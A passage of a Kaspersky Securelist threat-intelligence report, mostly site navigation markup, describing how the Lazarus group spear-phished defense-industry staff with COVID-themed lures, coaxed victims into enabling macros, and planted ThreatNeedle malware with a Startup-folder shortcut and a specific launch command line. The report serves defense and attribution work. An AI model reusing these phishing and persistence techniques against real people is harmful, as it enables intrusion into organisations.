href="https://securelist.com/category/apt-reports/">APT reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87881"><a href="https://securelist.com/category/incidents/">Incidents</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87886"><a href="https://securelist.com/category/research/">Research</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89476"><a href="https://securelist.com/category/malware-reports/">Malware reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89479"><a href="https://securelist.com/category/spam-and-phishing-reports/">Spam and phishing reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89477"><a href="https://securelist.com/category/publications/">Publications</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87882"><a href="https://securelist.com/category/kaspersky-security-bulletin/">Kaspersky Security Bulletin</a> </ul> <li class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-101953"><a href="https://securelist.com/all/">Archive</a> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87899"><a href="https://securelist.com/tags/">All Tags</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101954"><a href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">APT Logbook</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101955"><a href="https://securelist.com/webinars/">Webinars</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-102687"><a href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Statistics</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87901"><a target="_blank" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Encyclopedia</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87902"><a target="_blank" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Threats descriptions</a> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-105984"><a href="https://securelist.com/ksb-2021/">KSB 2021</a> <li class="splitter"></li> <li class="parent" data-parent="About Us" data-icon="top-item"><a rel="About Us" href="#"><i class="top-item"></i><span>About Us</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87792"><a href="https://www.kaspersky.com/about/company?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Company</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87968"><a href="https://www.kaspersky.com/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87971"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87796"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Press Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87797"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87798"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Sponsorships</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87970"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87793"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Contacts</a> </ul> <li class="parent" data-parent="Partners" data-icon="top-item"><a rel="Partners" href="#"><i class="top-item"></i><span>Partners</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87768"><a href="https://www.kasperskypartners.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Find a Partner</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87769"><a href="https://www.kaspersky.com/partners?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Partner Program</a> </ul> </ul> <div class="background-overlay"></div> </div> <div class="c-page"> <section class="c-block c-block--bg-image c-page-header js-sticky-header" style="background-image: url(https://securelist.com/wp-content/themes/securelist2020/assets/images/content/bg-gradient-01.jpg);"> <div class="o-container-fluid"> <div class="c-page-header__wrapper u-mt-spacer-base-"> <div class="o-row o-row--small-gutters"> <div class="o-col-3@md u-mt-spacer-base-"> <a data-element-id="content-menu" href="#" class="c-page-nav-toggle js-main-menu-toggle"> <span class="c-page-nav-toggle__icon"> <span></span> <span></span> <span></span> </span> <span class="c-page-nav-toggle__text">Content menu</span> <span class="c-page-nav-toggle__text c-page-nav-toggle__text--active">Close</span> </a> </div> <div class="o-col-6@md"> <form class="c-page-search__form js-main-search-popup js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get"> <div class="c-form-element c-form-element--style-fill"> <div class="c-form-element__field wp_autosearch_form_wrapper"> <input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off"> </div> </div> <button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></button> </form> </div> <div class="o-col-3@md c-page-header__utilities"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="c-button c-subscribe-modal-toggle js-modal-open"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg><span>Subscribe</span></a> <div class="c-page-header__dropdown-wrapper"> </div> </div> </div> </div> </div> <nav class="c-page-nav c-color--invert"> <div class="o-container-fluid"> <div class="o-row o-row--small-gutters"> <div class="o-col-3@md c-page-nav__info"> <div class="c-site-logo__group"> <a data-element-id="content-menu-securelist-logo" href="https://securelist.com/" class="c-site-logo c-site-logo--basic c-site-logo--sm"></a> <span class="c-site-tagline">by Kaspersky</span> </div> <a data-element-id="content-menu-dark-mode" href="#" class="c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> </div> <div class="o-col-9@md"> <div class="c-page-menu"> <div class="o-row c-page-menu__dividers"> <div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p id="menu-item-226" class="menu-item-threats section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/threat-categories/" data-element-id="content-menu-link">Threats</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Threats</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li id="menu-item-99839" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-99839"><a href="https://securelist.com/threat-category/apt-targeted-attacks/" data-element-id="content-menu-link">APT (Targeted attacks)</a></li> <li id="menu-item-89457" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89457"><a href="https://securelist.com/threat-category/secure-environment/" data-element-id="content-menu-link">Secure environment (IoT)</a></li> <li id="menu-item-63231" class="topic-item vulnerabilities menu-item menu-item-type-custom menu-item-object-custom menu-item-63231"><a href="https://securelist.com/threat-category/mobile-threats/" data-element-id="content-menu-link">Mobile threats</a></li> <li id="menu-item-63229" class="topic-item detected menu-item menu-item-type-custom menu-item-object-custom menu-item-63229"><a href="https://securelist.com/threat-category/financial-threats/" data-element-id="content-menu-link">Financial threats</a></li> <li id="menu-item-89458" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89458"><a href="https://securelist.com/threat-category/spam-and-phishing/" data-element-id="content-menu-link">Spam and phishing</a></li> <li id="menu-item-99840" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-99840"><a href="https://securelist.com/threat-category/industrial-threats/" data-element-id="content-menu-link">Industrial threats</a></li> <li id="menu-item-89465" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89465"><a href="https://securelist.com/threat-category/web-threats/" data-element-id="content-menu-link">Web threats</a></li> <li id="menu-item-89459" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89459"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/" data-element-id="content-menu-link">Vulnerabilities and exploits</a></li> <li id="menu-item-113855" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113855"><a href="https://securelist.com/threat-categories/" data-element-id="content-menu-link">All threats</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p id="menu-item-230" class="menu-item-categories section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-230 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/categories/" data-element-id="content-menu-link">Categories</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Categories</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li id="menu-item-84158" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-84158"><a href="https://securelist.com/category/apt-reports/" data-element-id="content-menu-link">APT reports</a></li> <li id="menu-item-99841" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99841"><a href="https://securelist.com/category/malware-descriptions/" data-element-id="content-menu-link">Malware descriptions</a></li> <li id="menu-item-84160" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84160"><a href="https://securelist.com/category/kaspersky-security-bulletin/" data-element-id="content-menu-link">Security Bulletin</a></li> <li id="menu-item-84161" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84161"><a href="https://securelist.com/category/malware-reports/" data-element-id="content-menu-link">Malware reports</a></li> <li id="menu-item-89460" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89460"><a href="https://securelist.com/category/spam-and-phishing-reports/" data-element-id="content-menu-link">Spam and phishing reports</a></li> <li id="menu-item-99842" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99842"><a href="https://securelist.com/category/security-technologies/" data-element-id="content-menu-link">Security technologies</a></li> <li id="menu-item-84165" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84165"><a href="https://securelist.com/category/research/" data-element-id="content-menu-link">Research</a></li> <li id="menu-item-84164" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84164"><a href="https://securelist.com/category/publications/" data-element-id="content-menu-link">Publications</a></li> <li id="menu-item-113876" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113876"><a href="https://securelist.com/categories/" data-element-id="content-menu-link">All categories</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><p id="menu-item-277" class="menu-item-tags section-title after-accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-277 c-page-menu__title u-hidden u-block@md"><a data-element-id="content-menu-link">Other sections</a></p> <ul class="sub-menu"> <li id="menu-item-100526" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100526"><a href="https://securelist.com/all/" data-element-id="content-menu-link">Archive</a></li> <li id="menu-item-57837" class="show-all-tags menu-item menu-item-type-post_type menu-item-object-page menu-item-57837"><a href="https://securelist.com/tags/" data-element-id="content-menu-link">All tags</a></li> <li id="menu-item-101956" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101956"><a href="https://securelist.com/webinars/" data-element-id="content-menu-link">Webinars</a></li> <li id="menu-item-101126" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101126"><a target="_blank" rel="noopener noreferrer" href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">APT Logbook</a></li> <li id="menu-item-241" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a target="_blank" rel="noopener noreferrer" href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Statistics</a></li> <li id="menu-item-86643" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86643"><a target="_blank" rel="noopener noreferrer" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Encyclopedia</a></li> <li id="menu-item-58141" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58141"><a target="_blank" rel="noopener noreferrer" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Threats descriptions</a></li> <li id="menu-item-115044" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-115044"><a href="https://securelist.com/ksb-2024/" data-element-id="content-menu-link">KSB 2024</a></li> </ul> </li> </div> </div> </div> </div> </div> </div> </nav> </section> <section class="c-block c-block--spacing-t@md c-block--spacing-b-small@md c-block--divider-internal" style="z-index:10"> <div class="o-container-fluid"> <article class="c-article"> <header class="c-article__header"> <figure class="c-article__figure u-hidden@md"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data-800x450.jpg" data-srcset="" srcset="" /> </figure> <p class="c-article__headline u-hidden@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <h1 class="c-article__title">Lazarus targets defense industry with ThreatNeedle</h1> <div class="c-article__info"> <p class="c-article__headline u-hidden u-block@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <p class="u-uppercase"><time datetime="2021-02-25T10:00:53+00:00">25 Feb 2021</time></p> <p class="c-article__reading u-ml-auto@md"> <svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-hourglass"></use></svg> <span class="js-reading-time"></span> minute read </p> </div> </header> <div class="c-article__wrapper"> <div class="c-article__main"> <div class="c-highlight c-highlight--overflow-down@md js-accordion u-hidden@md"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#initial-infection">Initial infection</a></li><li><a href="#malware-implants">Malware implants</a></li><ul class='c-list-links'><li><a href="#threatneedle-installer">ThreatNeedle installer</a></li><li><a href="#threatneedle-loader">ThreatNeedle loader</a></li><li><a href="#threatneedle-backdoor">ThreatNeedle backdoor</a></li></ul><li><a href="#post-exploitation-phase">Post-exploitation phase</a></li><ul class='c-list-links'><li><a href="#credential-gathering">Credential gathering</a></li><li><a href="#lateral-movement">Lateral movement</a></li><li><a href="#overcoming-network-segmentation">Overcoming network segmentation</a></li><li><a href="#exfiltration">Exfiltration</a></li></ul><li><a href="#attribution">Attribution</a></li><ul class='c-list-links'><li><a href="#connection-with-deathnote-cluster">Connection with DeathNote cluster</a></li><li><a href="#connection-with-operation-applejeus">Connection with Operation AppleJeus</a></li><li><a href="#connection-with-bookcode-cluster">Connection with Bookcode cluster</a></li></ul><li><a href="#conclusions">Conclusions</a></li><li><a href="#appendix-i-indicators-of-compromise">Appendix I – Indicators of Compromise</a></li><li><a href="#appendix-ii-mitre-attck-mapping">Appendix II – MITRE ATT&amp;CK Mapping</a></li></ul> </div> </div> </div> <div class="o-row c-article__container"> <div class="o-col c-article__content js-article-body"> <div class="js-reading-wrapper"> <figure class="c-article__figure u-hidden u-block@md"> <img width="1200" height="600" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data-1200x600.jpg" class="attachment-securelist-2020-thumbnail-large size-securelist-2020-thumbnail-large wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data-1200x600.jpg" data-srcset="" srcset="" /> </figure> <div class="c-article__authors u-hidden u-block@md"> <p class="c-block__title">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/vyacheslavkopeytsev/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_3.png"> <span>Vyacheslav Kopeytsev</span></a> </li> <li> <a href="https://securelist.com/author/seongsupark/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_2.png"> <span>Seongsu Park</span></a> </li> </ul> </div> <div class="js-reading-content"> <div class="c-wysiwyg"> <p><a href="https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Lazarus-targets-defense-industry-with-Threatneedle-En.pdf" rel="noopener" target="_blank">Lazarus targets defense industry with ThreatNeedle (PDF)</a></p> <p>We named Lazarus the most active group of 2020. We&#8217;ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG <a href="https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/">has recently published a post</a> about a campaign by Lazarus targeting security researchers. After taking a closer look, we identified the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group&#8217;s other campaigns.</p> <p>The group made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. After gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim environment. We observed how they overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the intranet network to their remote server. So far organizations in more than a dozen countries have been affected.</p> <input type="hidden" class="category_for_banner" data-type="posts" value="apt-inpost-banner" /> <p>During this investigation we had a chance to look into the command-and-control infrastructure. The attackers configured multiple C2 servers for various stages, reusing several scripts we&#8217;ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns.</p> <p>The full article is available on <a href="https://www.kaspersky.com/enterprise-security/threat-intelligence" rel="noopener" target="_blank">Kaspersky Threat Intelligence</a>. Customers of Kaspersky Intelligence reporting may contact: <a href="mailto:intelreports@kaspersky.com" rel="noopener" target="_blank">intelreports@kaspersky.com</a><br /> For more information please contact: <a href="mailto:ics-cert@kaspersky.com" rel="noopener" target="_blank">ics-cert@kaspersky.com</a></p> <h2 id="initial-infection">Initial infection</h2> <p>In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company.</p> <p>Email addresses in those departments received phishing emails that either had a malicious Word document attached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today&#8217;s hottest topic – COVID-19 infections. The phishing emails were carefully crafted and written on behalf of a medical center that is part of the organization under attack.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100809" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01.png" alt="" width="1254" height="739" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01.png 1254w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-300x177.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-1024x603.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-768x453.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-297x175.png 297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-370x218.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-475x280.png 475w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-800x471.png 800w" sizes="auto, (max-width: 1254px) 100vw, 1254px" /></a></p> <p style="text-align: center"><strong><em>Phishing email with links to malicious documents</em></strong></p> <p>The attackers registered accounts with a public email service, making sure the sender&#8217;s email addresses looked similar to the medical center&#8217;s real email address. The signature shown in the phishing emails included the actual personal data of the deputy head doctor of the attacked organization&#8217;s medical center. The attackers were able to find this information on the medical center&#8217;s public website.</p> <p>A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system.</p> <p>The document contains information on the population health assessment program and is not directly related to the subject of the phishing email (COVID-19), suggesting the attackers may not completely understand the meaning of the contents they used.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100810" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02.png" alt="" width="800" height="600" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-300x225.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-768x576.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-200x150.png 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-233x175.png 233w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-370x278.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-373x280.png 373w" sizes="auto, (max-width: 800px) 100vw, 800px" /></a></p> <p style="text-align: center"><strong><em>Contents of malicious document</em></strong></p> <p>The content of the lure document was copied from an online post by a health clinic.</p> <p>Our investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being disabled in the Microsoft Office installation of the targeted systems. In order to persuade the target to allow the malicious macro, the attacker sent another email showing how to enable macros in Microsoft Office.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100811" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03.png" alt="" width="1245" height="718" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03.png 1245w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-300x173.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-1024x591.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-768x443.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-303x175.png 303w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-370x213.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-486x280.png 486w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-800x461.png 800w" sizes="auto, (max-width: 1245px) 100vw, 1245px" /></a></p> <p style="text-align: center"><strong><em>Email with instructions on enabling macros #1</em></strong></p> <p>After sending the above email with explanations, the attackers realized that the target was using a different version of Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently sent another email showing the correct procedure in a screenshot with a Russian language pack.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100812" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04.png" alt="" width="858" height="656" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04.png 858w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-300x229.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-768x587.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-229x175.png 229w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-370x283.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-366x280.png 366w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-800x612.png 800w" sizes="auto, (max-width: 858px) 100vw, 858px" /></a></p> <p style="text-align: center"><strong><em>Email with instructions on enabling macros #2</em></strong></p> <p>The content in the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any grammatical mistakes. However, in subsequent emails the attackers made numerous errors, suggesting they may not be native Russian speakers and were using translation tools.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100813" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05.png" alt="" width="697" height="352" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05.png 697w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05-300x152.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05-347x175.png 347w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05-370x187.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05-554x280.png 554w" sizes="auto, (max-width: 697px) 100vw, 697px" /></a></p> <p style="text-align: center"><strong><em>Email containing several grammatical mistakes</em></strong></p> <p>On June 3, 2020, one of the malicious attachments was opened by employees and at 9:30 am local time the attackers gained remote control of the infected system.</p> <p>This group also utilized different types of spear-phishing attack. One of the compromised hosts received several spear-phishing documents on May 19, 2020. The malicious file that was delivered, named Boeing_AERO_GS.docx, fetches a template from a remote server.</p> <p>However, no payload created by this malicious document could be discovered. We speculate that the infection from this malicious document failed for a reason unknown to us. A few days later, the same host opened a different malicious document. The threat actor wiped these files from disk after the initial infection meaning they could not be obtained.</p> <p>Nonetheless, a related malicious document with this malware was retrieved based on our telemetry. It creates a payload and shortcut file and then continues executing the payload by using the following command line parameters.</p> <ul> <li>Payload path: %APPDATA%\Microsoft\Windows\lconcaches.db</li> <li>Shortcut path: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk</li> <li>Command Line; please note that the string at the end is hard-coded, but different for each sample:</li> <li>exe [dllpath],Dispatch n2UmQ9McxUds2b29</li> </ul> <p>The content of the decoy document depicts the job description of a generator/power industry engineer.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100814" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06.png" alt="" width="1239" height="725" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06.png 1239w, 